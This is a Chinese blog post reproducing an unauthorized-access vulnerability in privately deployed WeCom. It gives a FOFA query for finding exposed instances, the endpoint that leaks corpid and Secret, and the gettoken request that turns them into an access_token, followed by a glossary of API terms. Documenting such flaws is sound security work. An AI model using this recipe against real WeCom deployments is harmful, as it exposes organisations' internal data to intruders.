企业微信未授权访问复现
涂寐 Lv5
  2023-08-16 22:02:56 2023-08-16 22:02   2023-10-08 22:46:07    

企业微信(私有部署)存在未授权访问漏洞,访问 /cgi-bin/gateway/agentinfo 可获取泄露的 corpid 和 Secret,利用该参数可获取access_token

fofa 指纹

1
app="Tencent-企业微信"

操作流程

  1. 获取企业微信secret与corpid;

  2. 获取acces_token

  3. 获取数据

获取企业微信secret与corpid

1
http://xxxx.cn/cgi-bin/gateway/agentinfo
  • 失败1

image

  • 失败2

image

  • 失败3

image

  • 成功

image

获取acces_token

1
https://xxx/cgi-bin/gettoken?corpid=strcorpid&corpsecret=Secret
  • 成功

image

  • 失败

image

获取数据

  • 来得太迟了,基本修复了

image

参考信息

1
2
3
4
https://developer.work.weixin.qq.com/document/path/90664(企业微信开发者中心)
https://developer.work.weixin.qq.com/resource/devtool(企业微信API调用)
https://mp.weixin.qq.com/s/MyIUhkxmyw-msCPnhUi92A
https://xz.aliyun.com/t/11092
1
2
3
4
5
6
7
8
access_token:是企业后台去企业微信的后台获取信息时的重要票据,由corpid和secret产生。所有接口在通信时都需要携带此信息用于验证接口的访问权限。
corpsecret:是企业应用里面用于保障数据安全的“钥匙”,每一个应用都有一个独立的访问密钥,为了保证数据的安全,secret务必不能泄漏.
corpid:每个企业都拥有唯一的corpid.
userid:每个成员都有唯一的userid.
部门id:每个部门都有唯一的id.
tagid:每个标签都有唯一的标签id
external_userid:企业外部联系人的id,可能是微信用户,也可能是企业微信用户.
agentid:每个应用都有唯一的agentid.
  • 本文标题企业微信未授权访问复现
  • 本文作者涂寐
  • 创建时间2023-08-16 22:02:56
  • 本文链接article/b4537438.html
  • 版权声明本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
 评论
  1. 1. fofa 指纹
  2. 2. 操作流程
    1. 2.1. 获取企业微信secret与corpid
    2. 2.2. 获取acces_token
    3. 2.3. 获取数据
  3. 3. 参考信息